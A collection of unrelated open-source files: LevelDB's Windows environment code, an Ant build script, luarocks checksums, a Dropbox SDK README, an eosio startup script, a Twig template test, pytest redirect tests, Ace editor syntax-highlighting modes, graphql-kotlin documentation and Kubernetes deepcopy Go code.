return WindowsError(filename, ::GetLastError());
}
if (!mmap_limiter_.Acquire()) {
*result = new WindowsRandomAccessFile(filename, std::move(handle));
return Status::OK();
}
LARGE_INTEGER file_size;
Status status;
if (!::GetFileSizeEx(handle.get(), &file_size)) {
mmap_limiter_.Release();
return WindowsError(filename, ::GetLastError());
}
ScopedHandle mapping =
::CreateFileMappingA(handle.get(),
/*security attributes=*/nullptr, PAGE_READONLY,
/*dwMaximumSizeHigh=*/0,
/*dwMaximumSizeLow=*/0,
/*lpName=*/nullptr);
if (mapping.is_valid()) {
void* mmap_base = ::MapViewOfFile(mapping.get(), FILE_MAP_READ,
/*dwFileOffsetHigh=*/0,
/*dwFileOffsetLow=*/0,
/*dwNumberOfBytesToMap=*/0);
if (mmap_base) {
*result = new WindowsMmapReadableFile(
filename, reinterpret_cast<char*>(mmap_base),
static_cast<size_t>(file_size.QuadPart), &mmap_limiter_);
return Status::OK();
}
}
mmap_limiter_.Release();
return WindowsError(filename, ::GetLastError());
}
Status NewWritableFile(const std::string& filename,
WritableFile** result) override {
DWORD desired_access = GENERIC_WRITE;
DWORD share_mode = 0; // Exclusive access.
ScopedHandle handle = ::CreateFileA(
filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
*result = nullptr;
return WindowsError(filename, ::GetLastError());
}
*result = new WindowsWritableFile(filename, std::move(handle));
return Status::OK();
}
Status NewAppendableFile(const std::string& filename,
WritableFile** result) override {
DWORD desired_access = FILE_APPEND_DATA;
DWORD share_mode = 0; // Exclusive access.
ScopedHandle handle = ::CreateFileA(
filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
*result = nullptr;
return WindowsError(filename, ::GetLastError());
}
*result = new WindowsWritableFile(filename, std::move(handle));
return Status::OK();
}
bool FileExists(const std::string& filename) override {
return GetFileAttributesA(filename.c_str()) != INVALID_FILE_ATTRIBUTES;
}
Status GetChildren(const std::string& directory_path,
std::vector<std::string>* result) override {
const std::string find_pattern = directory_path + "\\*";
WIN32_FIND_DATAA find_data;
HANDLE dir_handle = ::FindFirstFileA(find_pattern.c_str(), &find_data);
if (dir_handle == INVALID_HANDLE_VALUE) {
DWORD last_error = ::GetLastError();
if (last_error == ERROR_FILE_NOT_FOUND) {
return Status::OK();
}
return WindowsError(directory_path, last_error);
}
do {
char base_name[_MAX_FNAME];
char ext[_MAX_EXT];
if (!_splitpath_s(find_data.cFileName, nullptr, 0, nullptr, 0, base_name,
ARRAYSIZE(base_name), ext, ARRAYSIZE(ext))) {
result->emplace_back(std::string(base_name) + ext);
}
} while (::FindNextFileA(dir_handle, &find_data));
DWORD last_error = ::GetLastError();
::FindClose(dir_handle);
if (last_error != ERROR_NO_MORE_FILES) {
return WindowsError(directory_path, last_error);
}
return Status::OK();
}
Status RemoveFile(const std::string& filename) override {
if (!::DeleteFileA(filename.c_str())) {
return WindowsError(filename, ::GetLastError());
}
return Status::OK();
}
Status CreateDir(const std::string& dirname) override {
if (!::CreateDirectoryA(dirname.c_str(), nullptr)) {
return WindowsError(dirname, ::GetLastError());
}
return Status::OK();
}
Status RemoveDir(const std::string& dirname) override {
if (!::RemoveDirectoryA(dirname.c_str())) {
return WindowsError(dirname, ::GetLastError());
}
return Status::OK();
}
Status GetFileSize(const std::string& filename, uint64_t* size) override {
WIN32_FILE_ATTRIBUTE_DATA file_attributes;
if (!::GetFileAttributesExA(filename.c_str(), GetFileExInfoStandard,
&file_attributes)) {
return WindowsError(filename, ::GetLastError());
}
ULARGE_INTEGER file_size;
file_size.HighPart = file_attributes.nFileSizeHigh;
file_size.LowPart = file_attributes.nFileSizeLow;
*size = file_size.QuadPart;
return Status::OK();
}
Status RenameFile(const std::string& from, const std::string& to) override {
// Try a simple move first. It will only succeed when |to| doesn't already
// exist.
if (::MoveFileA(from.c_str(), to.c_str())) {
return Status::OK();
}
DWORD move_error = ::GetLastError();
// Try the full-blown replace if the move fails, as ReplaceFile will only
// succeed when |to| does exist. When writing to a network share, we may not
// be able to change the ACLs. Ignore ACL errors then
// (REPLACEFILE_IGNORE_MERGE_ERRORS).
if (::ReplaceFileA(to.c_str(), from.c_str(), /*lpBackupFileName=*/nullptr,
REPLACEFILE_IGNORE_MERGE_ERRORS,
/*lpExclude=*/nullptr, /*lpReserved=*/nullptr)) {
return Status::OK();
}
DWORD replace_error = ::GetLastError();
// In the case of FILE_ERROR_NOT_FOUND from ReplaceFile, it is likely that
// |to| does not exist. In this case, the more relevant error comes from the
// call to MoveFile.
if (replace_error == ERROR_FILE_NOT_FOUND ||
replace_error == ERROR_PATH_NOT_FOUND) {
return WindowsError(from, move_error);
} else {
return WindowsError(from, replace_error);
}
}
Status LockFile(const std::string& filename, FileLock** lock) override {
*lock = nullptr;
Status result;
ScopedHandle handle = ::CreateFileA(
filename.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ,
/*lpSecurityAttributes=*/nullptr, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL,
nullptr);
if (!handle.is_valid()) {
result = WindowsError(filename, ::GetLastError());
} else if (!LockOrUnlock(handle.get(), true)) {
result = WindowsError("lock " + filename, ::GetLastError());
} else {
*lock = new WindowsFileLock(std::move(handle), filename);
}
return result;
}
Status UnlockFile(FileLock* lock) override {
WindowsFileLock* windows_file_lock =
reinterpret_cast<WindowsFileLock*>(lock);
if (!LockOrUnlock(windows_file_lock->handle().get(), false)) {
return WindowsError("unlock " + windows_file_lock->filename(),
::GetLastError());
}
delete windows_file_lock;
return Status::OK();
}
void Schedule(void (*background_work_function)(void* background_work_arg),
void* background_work_arg) override;
void StartThread(void (*thread_main)(void* thread_main_arg),
void* thread_main_arg) override {
std::thread new_thread(thread_main, thread_main_arg);
new_thread.detach();
}
Status GetTestDirectory(std::string* result) override {
const char* env = getenv("TEST_TMPDIR");
if (env && env[0] != '\0') {
*result = env;
return Status::OK();
}
char tmp_path[MAX_PATH];
if (!GetTempPathA(ARRAYSIZE(tmp_path), tmp_path)) {
return WindowsError("GetTempPath", ::GetLastError());
}
std::stringstream ss;
ss << tmp_path << "leveldbtest-" << std::this_thread::get_id();
*result = ss.str();
// Directory may already exist
CreateDir(*result);
return Status::OK();
}
Status NewLogger(const std::string& filename, Logger** result) override {
std::FILE* fp = std::fopen(filename.c_str(), "w");
if (fp == nullptr) {
*result = nullptr;
return WindowsError(filename, ::GetLastError());
} else {
*result = new WindowsLogger(fp);
return Status::OK();
}
}
uint64_t NowMicros() override {
// GetSystemTimeAsFileTime typically has a resolution of 10-20 msec.
// TODO(cmumford): Switch to GetSystemTimePreciseAsFileTime which is
// available in Windows 8 and later.
FILETIME ft;
::GetSystemTimeAsFileTime(&ft);
// Each tick represents a 100-nanosecond intervals since January 1, 1601
// (UTC).
uint64_t num_ticks =
(static_cast<uint64_t>(ft.dwHighDateTime) << 32) + ft.dwLowDateTime;
return num_ticks / 10;
}
void SleepForMicroseconds(int micros) override {
std::this_thread::sleep_for(std::chrono::microseconds(micros));
}
private:
void BackgroundThreadMain();
static void BackgroundThreadEntryPoint(WindowsEnv* env) {
env->BackgroundThreadMain();
}
// Stores the work item data in a Schedule() call.
//
// Instances are constructed on the thread calling Schedule() and used on the
// background thread.
//
// This structure is thread-safe beacuse it is immutable.
struct BackgroundWorkItem {
explicit BackgroundWorkItem(void (*function)(void* arg), void* arg)
: function(function), arg(arg) {}
void (*const function)(void*);
void* const arg;
};
port::Mutex background_work_mutex_;
port::CondVar background_work_cv_ GUARDED_BY(background_work_mutex_);
bool started_background_thread_ GUARDED_BY(background_work_mutex_);
std::queue<BackgroundWorkItem> background_work_queue_
GUARDED_BY(background_work_mutex_);
Limiter mmap_limiter_; // Thread-safe.
};
// Return the maximum number of concurrent mmaps.
int MaxMmaps() { return g_mmap_limit; }
WindowsEnv::WindowsEnv()
: background_work_cv_(&background_work_mutex_),
started_background_thread_(false),
mmap_limiter_(MaxMmaps()) {}
void WindowsEnv::Schedule(
void (*background_work_function)(void* background_work_arg),
void* background_work_arg) {
background_work_mutex_.Lock();
// Start the background thread, if we haven't done so already.
if (!started_background_thread_) {
started_background_thread_ = true;
std::thread background_thread(WindowsEnv::BackgroundThreadEntryPoint, this);
background_thread.detach();
}
// If the queue is empty, the background thread may be waiting for work.
if (background_work_queue_.empty()) {
background_work_cv_.Signal();
}
background_work_queue_.emplace(background_work_function, background_work_arg);
background_work_mutex_.Unlock();
}
void WindowsEnv::BackgroundThreadMain() {
while (true) {
background_work_mutex_.Lock();
// Wait until there is work to be done.
while (background_work_queue_.empty()) {
background_work_cv_.Wait();
}
assert(!background_work_queue_.empty());
auto background_work_function = background_work_queue_.front().function;
void* background_work_arg = background_work_queue_.front().arg;
background_work_queue_.pop();
background_work_mutex_.Unlock();
background_work_function(background_work_arg);
}
}
// Wraps an Env instance whose destructor is never created.
//
// Intended usage:
// using PlatformSingletonEnv = SingletonEnv<PlatformEnv>;
// void ConfigurePosixEnv(int param) {
// PlatformSingletonEnv::AssertEnvNotInitialized();
// // set global configuration flags.
// }
// Env* Env::Default() {
// static PlatformSingletonEnv default_env;
// return default_env.env();
// }
template <typename EnvType>
class SingletonEnv {
public:
SingletonEnv() {
#if !defined(NDEBUG)
env_initialized_.store(true, std::memory_order::memory_order_relaxed);
#endif // !defined(NDEBUG)
static_assert(sizeof(env_storage_) >= sizeof(EnvType),
"env_storage_ will not fit the Env");
static_assert(alignof(decltype(env_storage_)) >= alignof(EnvType),
"env_storage_ does not meet the Env's alignment needs");
new (&env_storage_) EnvType();
}
~SingletonEnv() = default;
SingletonEnv(const SingletonEnv&) = delete;
SingletonEnv& operator=(const SingletonEnv&) = delete;
Env* env() { return reinterpret_cast<Env*>(&env_storage_); }
static void AssertEnvNotInitialized() {
#if !defined(NDEBUG)
assert(!env_initialized_.load(std::memory_order::memory_order_relaxed));
#endif // !defined(NDEBUG)
}
private:
typename std::aligned_storage<sizeof(EnvType), alignof(EnvType)>::type
env_storage_;
#if !defined(NDEBUG)
static std::atomic<bool> env_initialized_;
#endif // !defined(NDEBUG)
};
#if !defined(NDEBUG)
template <typename EnvType>
std::atomic<bool> SingletonEnv<EnvType>::env_initialized_;
#endif // !defined(NDEBUG)
using WindowsDefaultEnv = SingletonEnv<WindowsEnv>;
} // namespace
void EnvWindowsTestHelper::SetReadOnlyMMapLimit(int limit) {
WindowsDefaultEnv::AssertEnvNotInitialized();
g_mmap_limit = limit;
}
Env* Env::Default() {
static WindowsDefaultEnv env_container;
return env_container.env();
}
} // namespace leveldb
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Oracle nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-->
<project name="TransparentRuler" basedir="." default="jar">
<import file="nbproject/jdk.xml"/>
<target name="-prop-init">
<property file="user.build.properties"/>
<property file="build.properties"/>
</target>
<target name="-init" depends="-prop-init,-jdk-init"/>
<target name="compile" depends="-init" description="Compile main sources.">
<mkdir dir="${classes.dir}"/>
<javac srcdir="${src.dir}" destdir="${classes.dir}" debug="${debug}" deprecation="${deprecation}">
<classpath path="${cp}"/>
</javac>
<copy todir="${classes.dir}">
<fileset dir="${src.dir}"/>
</copy>
</target>
<target name="jar" depends="compile" description="Build JAR file for main sources.">
<jar jarfile="${jar}" compress="true">
<manifest>
<attribute name="Main-Class" value="${main.class}"/>
</manifest>
<fileset dir="${classes.dir}"/>
</jar>
</target>
<target name="run" depends="compile" description="Run application.">
<fail unless="main.class">Must set property 'main.class' (e.g. in build.properties)</fail>
<java classname="${main.class}" fork="true" failonerror="true">
<classpath path="${run.cp}"/>
</java>
</target>
<target name="javadoc" depends="-init" description="Build Javadoc.">
<mkdir dir="${javadoc.dir}"/>
<javadoc destdir="${javadoc.dir}">
<classpath path="${cp}"/>
<sourcepath>
<pathelement location="${src.dir}"/>
</sourcepath>
<fileset dir="${src.dir}"/>
</javadoc>
</target>
<target name="clean" depends="-init" description="Clean build products.">
<delete dir="${build.dir}"/>
<delete file="${jar}"/>
</target>
<target name="profile">
<ant antfile="nbproject/netbeans-targets.xml" target="profile"/>
</target>
</project>
| {
"pile_set_name": "Github"
} |
# computed by luarocks/buildroot
sha256 01211bb80dab92f87cece6e31854d73ae4a2ce06af7c48423a54313d72adf9fb wsapi-xavante-1.7-1.src.rock
sha256 6aa14e3febf7a9e810ce672b015f5a5514241ce5d1c3a6a48f921f089d270159 wsapi/doc/us/license.html
sha256 c7bf3061d00a96d10cb9dbc3a737d0af22594e2ef8f788842d7ab92eeaa864f2 wsapi/doc/us/license.md
| {
"pile_set_name": "Github"
} |
# Dropbox JavaScript SDK Examples
To run the examples in your development environment:
1. Clone this repo
2. Run `npm install`
3. From the root of your repository, start the development server with
`npm start`.
4. Point your browser to <http://0.0.0.0:8080/>
## Code flow example
1. Clone this repo
2. Run `npm install`
3. Create an app in the [App console](https://www.dropbox.com/developers/apps).
4. Set a redirect URI "http://localhost:3000/auth" on the app's page on the [App
console](https://www.dropbox.com/developers/apps).
5. Set app key and secret in `examples/javascript/code_flow_example.js` on lines
17 and 18.
6. Run `node examples/javascript/code_flow_example.js`
7. Point your browser to <http://0.0.0.0:3000/>
| {
"pile_set_name": "Github"
} |
echo "Starting eosiodev service ..."
if [ "$(ls -A $DATA_DIR)" ]; then
/opt/eosio/bin/nodeos --config-dir $CONFIG_DIR --data-dir $DATA_DIR -e --hard-replay
else
/opt/eosio/bin/nodeos --config-dir $CONFIG_DIR --data-dir $DATA_DIR -e #--delete-all-blocks
fi | {
"pile_set_name": "Github"
} |
--TEST--
"set" tag block capture
--TEMPLATE--
{% set foo %}f<br />o<br />o{% endset %}
{{ foo }}
--DATA--
return []
--EXPECT--
f<br />o<br />o
| {
"pile_set_name": "Github"
} |
import pytest
from utils.urls import assert_valid_url
from .map_301 import (
DEFAULT_SAMPLES_URLS,
FIREFOX_ACCOUNTS_URLS,
GITHUB_IO_URLS,
LEGACY_URLS,
MARIONETTE_URLS,
MOZILLADEMOS_URLS,
REDIRECT_URLS,
SCL3_REDIRECT_URLS,
WEBEXT_URLS,
ZONE_REDIRECT_URLS,
)
# while these test methods are similar, they're each testing a
# subset of redirects, and it was easier to work with them separately.
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", REDIRECT_URLS, ids=[item["url"] for item in REDIRECT_URLS]
)
def test_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", GITHUB_IO_URLS, ids=[item["url"] for item in GITHUB_IO_URLS]
)
def test_github_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MOZILLADEMOS_URLS, ids=[item["url"] for item in MOZILLADEMOS_URLS]
)
def test_mozillademos_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", DEFAULT_SAMPLES_URLS, ids=[item["url"] for item in DEFAULT_SAMPLES_URLS]
)
def test_default_samples_redirects(url, base_url, media_url):
url["base_url"] = base_url
url["location"] = f"{media_url}{url['url']}"
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", LEGACY_URLS, ids=[item["url"] for item in LEGACY_URLS])
def test_legacy_urls(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", SCL3_REDIRECT_URLS, ids=[item["url"] for item in SCL3_REDIRECT_URLS]
)
def test_slc3_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", ZONE_REDIRECT_URLS, ids=[item["url"] for item in ZONE_REDIRECT_URLS]
)
def test_zone_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MARIONETTE_URLS, ids=[item["url"] for item in MARIONETTE_URLS]
)
def test_marionette_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", WEBEXT_URLS, ids=[item["url"] for item in WEBEXT_URLS])
def test_webext_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", FIREFOX_ACCOUNTS_URLS, ids=[item["url"] for item in FIREFOX_ACCOUNTS_URLS]
)
def test_firefox_accounts_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
| {
"pile_set_name": "Github"
} |
ace.define("ace/mode/sh_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var reservedKeywords = exports.reservedKeywords = (
'!|{|}|case|do|done|elif|else|'+
'esac|fi|for|if|in|then|until|while|'+
'&|;|export|local|read|typeset|unset|'+
'elif|select|set'
);
var languageConstructs = exports.languageConstructs = (
'[|]|alias|bg|bind|break|builtin|'+
'cd|command|compgen|complete|continue|'+
'dirs|disown|echo|enable|eval|exec|'+
'exit|fc|fg|getopts|hash|help|history|'+
'jobs|kill|let|logout|popd|printf|pushd|'+
'pwd|return|set|shift|shopt|source|'+
'suspend|test|times|trap|type|ulimit|'+
'umask|unalias|wait'
);
var ShHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": reservedKeywords,
"support.function.builtin": languageConstructs,
"invalid.deprecated": "debugger"
}, "identifier");
var integer = "(?:(?:[1-9]\\d*)|(?:0))";
var fraction = "(?:\\.\\d+)";
var intPart = "(?:\\d+)";
var pointFloat = "(?:(?:" + intPart + "?" + fraction + ")|(?:" + intPart + "\\.))";
var exponentFloat = "(?:(?:" + pointFloat + "|" + intPart + ")" + ")";
var floatNumber = "(?:" + exponentFloat + "|" + pointFloat + ")";
var fileDescriptor = "(?:&" + intPart + ")";
var variableName = "[a-zA-Z_][a-zA-Z0-9_]*";
var variable = "(?:(?:\\$" + variableName + ")|(?:" + variableName + "=))";
var builtinVariable = "(?:\\$(?:SHLVL|\\$|\\!|\\?))";
var func = "(?:" + variableName + "\\s*\\(\\))";
this.$rules = {
"start" : [{
token : "constant",
regex : /\\./
}, {
token : ["text", "comment"],
regex : /(^|\s)(#.*)$/
}, {
token : "string",
regex : '"',
push : [{
token : "constant.language.escape",
regex : /\\(?:[$abeEfnrtv\\'"]|x[a-fA-F\d]{1,2}|u[a-fA-F\d]{4}([a-fA-F\d]{4})?|c.|\d{1,3})/
}, {
token : "constant",
regex : /\$\w+/
}, {
token : "string",
regex : '"',
next: "pop"
}, {
defaultToken: "string"
}]
}, {
regex : "<<<",
token : "keyword.operator"
}, {
stateName: "heredoc",
regex : "(<<-?)(\\s*)(['\"`]?)([\\w\\-]+)(['\"`]?)",
onMatch : function(value, currentState, stack) {
var next = value[2] == '-' ? "indentedHeredoc" : "heredoc";
var tokens = value.split(this.splitRegex);
stack.push(next, tokens[4]);
return [
{type:"constant", value: tokens[1]},
{type:"text", value: tokens[2]},
{type:"string", value: tokens[3]},
{type:"support.class", value: tokens[4]},
{type:"string", value: tokens[5]}
];
},
rules: {
heredoc: [{
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}],
indentedHeredoc: [{
token: "string",
regex: "^\t+"
}, {
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}]
}
}, {
regex : "$",
token : "empty",
next : function(currentState, stack) {
if (stack[0] === "heredoc" || stack[0] === "indentedHeredoc")
return stack[0];
return currentState;
}
}, {
token : "variable.language",
regex : builtinVariable
}, {
token : "variable",
regex : variable
}, {
token : "support.function",
regex : func
}, {
token : "support.function",
regex : fileDescriptor
}, {
token : "string", // ' string
start : "'", end : "'"
}, {
token : "constant.numeric", // float
regex : floatNumber
}, {
token : "constant.numeric", // integer
regex : integer + "\\b"
}, {
token : keywordMapper,
regex : "[a-zA-Z_][a-zA-Z0-9_]*\\b"
}, {
token : "keyword.operator",
regex : "\\+|\\-|\\*|\\*\\*|\\/|\\/\\/|~|<|>|<=|=>|=|!="
}, {
token : "paren.lparen",
regex : "[\\[\\(\\{]"
}, {
token : "paren.rparen",
regex : "[\\]\\)\\}]"
} ]
};
this.normalizeRules();
};
oop.inherits(ShHighlightRules, TextHighlightRules);
exports.ShHighlightRules = ShHighlightRules;
});
ace.define("ace/mode/makefile_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules","ace/mode/sh_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var ShHighlightFile = require("./sh_highlight_rules");
var MakefileHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": ShHighlightFile.reservedKeywords,
"support.function.builtin": ShHighlightFile.languageConstructs,
"invalid.deprecated": "debugger"
}, "string");
this.$rules =
{
"start": [
{
token: "string.interpolated.backtick.makefile",
regex: "`",
next: "shell-start"
},
{
token: "punctuation.definition.comment.makefile",
regex: /#(?=.)/,
next: "comment"
},
{
token: [ "keyword.control.makefile"],
regex: "^(?:\\s*\\b)(\\-??include|ifeq|ifneq|ifdef|ifndef|else|endif|vpath|export|unexport|define|endef|override)(?:\\b)"
},
{// ^([^\t ]+(\s[^\t ]+)*:(?!\=))\s*.*
token: ["entity.name.function.makefile", "text"],
regex: "^([^\\t ]+(?:\\s[^\\t ]+)*:)(\\s*.*)"
}
],
"comment": [
{
token : "punctuation.definition.comment.makefile",
regex : /.+\\/
},
{
token : "punctuation.definition.comment.makefile",
regex : ".+",
next : "start"
}
],
"shell-start": [
{
token: keywordMapper,
regex : "[a-zA-Z_$][a-zA-Z0-9_$]*\\b"
},
{
token: "string",
regex : "\\w+"
},
{
token : "string.interpolated.backtick.makefile",
regex : "`",
next : "start"
}
]
}
};
oop.inherits(MakefileHighlightRules, TextHighlightRules);
exports.MakefileHighlightRules = MakefileHighlightRules;
});
ace.define("ace/mode/folding/coffee",["require","exports","module","ace/lib/oop","ace/mode/folding/fold_mode","ace/range"], function(require, exports, module) {
"use strict";
var oop = require("../../lib/oop");
var BaseFoldMode = require("./fold_mode").FoldMode;
var Range = require("../../range").Range;
var FoldMode = exports.FoldMode = function() {};
oop.inherits(FoldMode, BaseFoldMode);
(function() {
this.getFoldWidgetRange = function(session, foldStyle, row) {
var range = this.indentationBlock(session, row);
if (range)
return range;
var re = /\S/;
var line = session.getLine(row);
var startLevel = line.search(re);
if (startLevel == -1 || line[startLevel] != "#")
return;
var startColumn = line.length;
var maxRow = session.getLength();
var startRow = row;
var endRow = row;
while (++row < maxRow) {
line = session.getLine(row);
var level = line.search(re);
if (level == -1)
continue;
if (line[level] != "#")
break;
endRow = row;
}
if (endRow > startRow) {
var endColumn = session.getLine(endRow).length;
return new Range(startRow, startColumn, endRow, endColumn);
}
};
this.getFoldWidget = function(session, foldStyle, row) {
var line = session.getLine(row);
var indent = line.search(/\S/);
var next = session.getLine(row + 1);
var prev = session.getLine(row - 1);
var prevIndent = prev.search(/\S/);
var nextIndent = next.search(/\S/);
if (indent == -1) {
session.foldWidgets[row - 1] = prevIndent!= -1 && prevIndent < nextIndent ? "start" : "";
return "";
}
if (prevIndent == -1) {
if (indent == nextIndent && line[indent] == "#" && next[indent] == "#") {
session.foldWidgets[row - 1] = "";
session.foldWidgets[row + 1] = "";
return "start";
}
} else if (prevIndent == indent && line[indent] == "#" && prev[indent] == "#") {
if (session.getLine(row - 2).search(/\S/) == -1) {
session.foldWidgets[row - 1] = "start";
session.foldWidgets[row + 1] = "";
return "";
}
}
if (prevIndent!= -1 && prevIndent < indent)
session.foldWidgets[row - 1] = "start";
else
session.foldWidgets[row - 1] = "";
if (indent < nextIndent)
return "start";
else
return "";
};
}).call(FoldMode.prototype);
});
ace.define("ace/mode/makefile",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/makefile_highlight_rules","ace/mode/folding/coffee"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextMode = require("./text").Mode;
var MakefileHighlightRules = require("./makefile_highlight_rules").MakefileHighlightRules;
var FoldMode = require("./folding/coffee").FoldMode;
var Mode = function() {
this.HighlightRules = MakefileHighlightRules;
this.foldingRules = new FoldMode();
};
oop.inherits(Mode, TextMode);
(function() {
this.lineCommentStart = "#";
this.$indentWithTabs = true;
this.$id = "ace/mode/makefile";
}).call(Mode.prototype);
exports.Mode = Mode;
});
| {
"pile_set_name": "Github"
} |
---
id: documenting-fields
title: Documenting Schema
---
Since Javadocs are not available at runtime for introspection, `graphql-kotlin-schema-generator` includes an annotation
class `@GraphQLDescription` that can be used to add schema descriptions to *any* GraphQL schema element. The string value can be in the Markdown format.
```kotlin
@GraphQLDescription("A useful widget")
data class Widget(
@GraphQLDescription("The widget's value that can be `null`")
val value: Int?
)
class WidgetQuery {
@GraphQLDescription("Creates new widget for given ID")
fun widgetById(@GraphQLDescription("The special ingredient") id: Int): Widget? = Widget(id)
}
```
The above query would produce the following GraphQL schema:
```graphql
schema {
query: Query
}
type Query {
"""Creates new widget for given ID"""
widgetById(
"""The special ingredient"""
id: Int!
): Widget
}
"""A useful widget"""
type Widget {
"""The widget's value that can be `null`"""
value: Int
}
```
| {
"pile_set_name": "Github"
} |
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by deepcopy-gen. DO NOT EDIT.
package v1beta1
import (
runtime "k8s.io/apimachinery/pkg/runtime"
)
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in ExtraValue) DeepCopyInto(out *ExtraValue) {
{
in := &in
*out = make(ExtraValue, len(*in))
copy(*out, *in)
return
}
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExtraValue.
func (in ExtraValue) DeepCopy() ExtraValue {
if in == nil {
return nil
}
out := new(ExtraValue)
in.DeepCopyInto(out)
return *out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *LocalSubjectAccessReview) DeepCopyInto(out *LocalSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new LocalSubjectAccessReview.
func (in *LocalSubjectAccessReview) DeepCopy() *LocalSubjectAccessReview {
if in == nil {
return nil
}
out := new(LocalSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *LocalSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceAttributes) DeepCopyInto(out *NonResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceAttributes.
func (in *NonResourceAttributes) DeepCopy() *NonResourceAttributes {
if in == nil {
return nil
}
out := new(NonResourceAttributes)
in.DeepCopyInto(out)
return out
}
